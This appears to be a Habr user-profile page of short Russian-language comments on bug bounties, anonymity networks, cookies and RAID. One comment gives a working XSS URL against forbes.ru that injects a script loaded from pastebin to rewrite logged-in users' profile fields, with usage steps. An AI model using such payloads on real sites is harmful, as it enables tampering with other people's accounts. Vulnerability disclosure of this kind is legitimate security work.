Pull to refresh
0
0
Send message
Помнится, а Facebook похожая бага была в прошлом году.
Она позволяла удалить любую фотографию любого пользователя.

Вознаграждение автору от FB составило $12 500.
thehackernews.com/2013/09/vulnerability-allowed-hacker-to-delete.html

Уж очень интересно, как Yahoo на подобный баг отреагирует в финансовом плане.
Идея, лежащая в основе этого браузера, SyncNet, чем-то похожа на идею, реализованную в TOR.

Я бы перефразировал:
«Идея, лежащая в основе этого браузера, SyncNet, взята чуть менее, чем полностью с идеи, реализованной во Freenet, которая существует уже почти 14 лет».
Идея, конечно, классная, но у меня есть технический вопрос по поводу сайта.
Зачем хранить в cookie идентификатор сессии размером ~1.5кб?

Это так тестируется выносливость сервера в случае возможных DDOS-атак? ;)

image
выкладывайте пример хоть по одному из приведенному сайту где произведены какое либо значимое действие (авторизация\изменение настроек\перевод) в отношении сайта

Да без проблем! Не поленился, написал специально для Вас код на JS, который, используя уязвимость на forbes.ru меняет каждое из полей «О себе» на «XSS PoC».

Скрипт относительно прост, написан на скорую руку, поэтому и комментариев нет. Писался только для PoC (Proof of Concept) эксплоита. Тестировался только в последней Mozilla Firefox.

Это лишь пример, но он наглядно демонстрирует, как с помощью XSS можно влиять на критически важную информацию пользователя.

image

Сам код находится здесь:
http://pastebin.com/bgBmN6kB

Использовать (после авторизации, естественно) так:
http://www.forbes.ru/search-content?keys=%22%3E%3Cscript%20src=%22http://pastebin.com/raw.php?i=bgBmN6kB%22%3E%3C/script%3E

Прошу заметить, что для вывода дебаг-лога используется всплывающее окно, созданное JavaScript'ом. Мозилла по-дефолту режет такие, поэтому для просмотра лога разрешить открытие нового окна, когда браузер это попросит.

Использование данного скрипта разрешено только в учебных целях. Я, автор вышеизложенного кода, не несу никакой ответственности за любое его незаконное использование.
Виджет для официальных страниц представляет из себя обычную HTML-страницу, которую в своём приложении может создать любой пользователь. За то, что аккаунт админа самого распространённого виджет-приложения взломан, должен нести ответственность исключительно его владелец.
RAID уже не в моде? Выигрыш и в производительности и в цене.
2

Information

Rating
Does not participate
Registered
Activity